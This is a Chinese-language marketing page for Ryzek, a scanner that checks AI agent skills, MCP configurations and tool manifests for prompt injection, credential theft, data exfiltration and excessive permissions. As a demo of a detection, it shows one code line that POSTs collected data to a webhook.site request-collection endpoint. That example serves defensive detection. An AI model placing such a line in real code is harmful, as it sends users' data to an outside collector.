面向 AI 智能体的安全扫描
在智能体运行某个技能之前,先弄清楚它到底会做什么。
Ryzek 读取技能、MCP 服务器配置和工具清单,检测提示词注入、隐藏指令、凭证窃取、权限过大,以及在您批准后发生变化的工具。每项检测结果都附有置信度评分及其理由。
Free 套餐:每月 20 次扫描,包含全部规则。扫描的文件仅在内存中读取,绝不会被存储。
const ENDPOINT = "https://webhook.site/0000-demo"; await fetch(ENDPOINT, { method: "POST", body: JSON.stringify(notes),});
Ryzek 发现了 1 个问题
Contains a hardcoded request-collection endpoint. These services exist to capture arbitrary inbound requests and are not used by production software.
webhook.site
真实的扫描器输出,在构建本页面时生成。
预告片
80 秒读懂 Ryzek。
智能体正在被悄悄交付什么——而 Ryzek 会在它运行之前告诉您。
工作原理
从上传到可付诸行动的结论。
无需安装。登录、添加文件,查看 Ryzek 的发现及其原因。
-
01 · 登录
创建免费账户
使用您已有的账户登录。您的扫描额度和工具历史记录会随您切换到任何设备。
-
02 · 添加文件
拖入您智能体加载的内容
技能文件夹及其脚本、MCP 配置、工具清单、
package.json或requirements.txt。 -
03 · 阅读
获得理由,而不只是一个标记
每项检测结果都会显示其严重程度、Ryzek 的置信度、理由、触发它的确切文本,以及所属的 OWASP 类别。
-
04 · 再次扫描
工具发生变化时及时得知
Ryzek 会保留每个工具的指纹——而非文件本身——以便在后续扫描中告知您,之前批准过的内容是否发生了变化。
可检测的内容
54 条规则,覆盖五大类风险。
每条规则在规则页面都有实时演示:触发它的文件、关键部分,以及扫描器实际报告的内容。
18 条规则 · 智能体安全
面向 AI 的文本
提示词注入、隐藏在注释或不可见字符中的指令、伪造的工具结果和记忆投毒。
5 条规则 · 数据外泄
数据外泄的路径
数据收集端点、DNS 隧道、图片信标,以及将私密读取与公开写入配对使用的工具。
7 条规则 · 凭证
放错了位置的机密信息
硬编码密钥、MCP 配置中的令牌、对凭证存储和 shell 历史记录的读取,以及云元数据请求。
13 条规则 · 供应链
代码的来源
未锁定版本和被冒充的服务器、已知存在漏洞的版本、安装钩子、影子服务器,以及被批准后发生变化的工具。
11 条规则 · 执行
超出实际需要的权限
权限过大、自动批准的工具、沙箱逃逸、持久化和命令注入。
全部规则
查看全部演示 →
按风险筛选,阅读通俗易懂的说明,查看每条规则的真实检测结果。
为什么选择 Ryzek
检测结果清晰可查,扫描器也会说明自己的能力边界。
一个动不动就“狼来了”的扫描器会被忽略,一个夸大其词的扫描器则会在不该被信任时被信任。Ryzek 的设计目标是避免这两种情况。
了解 Ryzek 无法看到的部分——包括仅在服务器运行期间才出现的行为,以及编译后程序内部的内容。
- 每项检测结果都附有明确理由。该规则的置信度有多高,以及为什么——这样低置信度的提示就不会被误读成已确认的攻击。
- 漂移检测。如果某个工具在您批准后悄然发生变化,会在您下次扫描时被标记出来。
- 您的文件不会被保留。上传内容在内存中扫描后即被丢弃。我们仅存储扫描次数和工具指纹,绝不存储文件内容。
- 已映射至 OWASP。每条规则都对应 OWASP MCP Top 10 中的一个类别。
- 每条规则,覆盖每种套餐。付费套餐增加的是用量和自动化能力,而不是检测能力。
常见问题
常见问题。
你们会保留我扫描的文件吗?
不会。文件通过 HTTPS 发送至扫描器,在内存中扫描,结果返回后即被丢弃。我们存储的是您已使用的扫描次数,以及每个工具的指纹——哈希值加上其权限标签——以便在其发生变化时告知您。详情请参阅隐私政策。
为什么我需要一个账户?
这样,您的扫描额度和工具历史记录会跟随您本人,而不是某台设备。漂移检测的前提是 Ryzek 记得上次扫描时该工具的样子。
我可以扫描哪些文件?
技能文件夹(一个 SKILL.md 加上其旁边的脚本)、MCP 配置文件(例如 .mcp.json 或 claude_desktop_config.json)、JSON 工具清单,以及用于检测安装钩子和存在漏洞的依赖项的 package.json 或 requirements.txt。
扫描结果干净就代表技能是安全的吗?
不是——它只代表 54 条规则均未匹配。Ryzek 读取文件,但不会运行文件,因此只在运行时才出现的行为,或编译后程序内部的行为,都超出了它的可见范围。扫描结果干净是个好迹象,但不是保证。
我可以在 CI 中运行它吗?
目前还不行。CI 集成已规划在付费套餐中推出。如果这对您很重要,请告诉我们——这有助于我们决定优先做什么。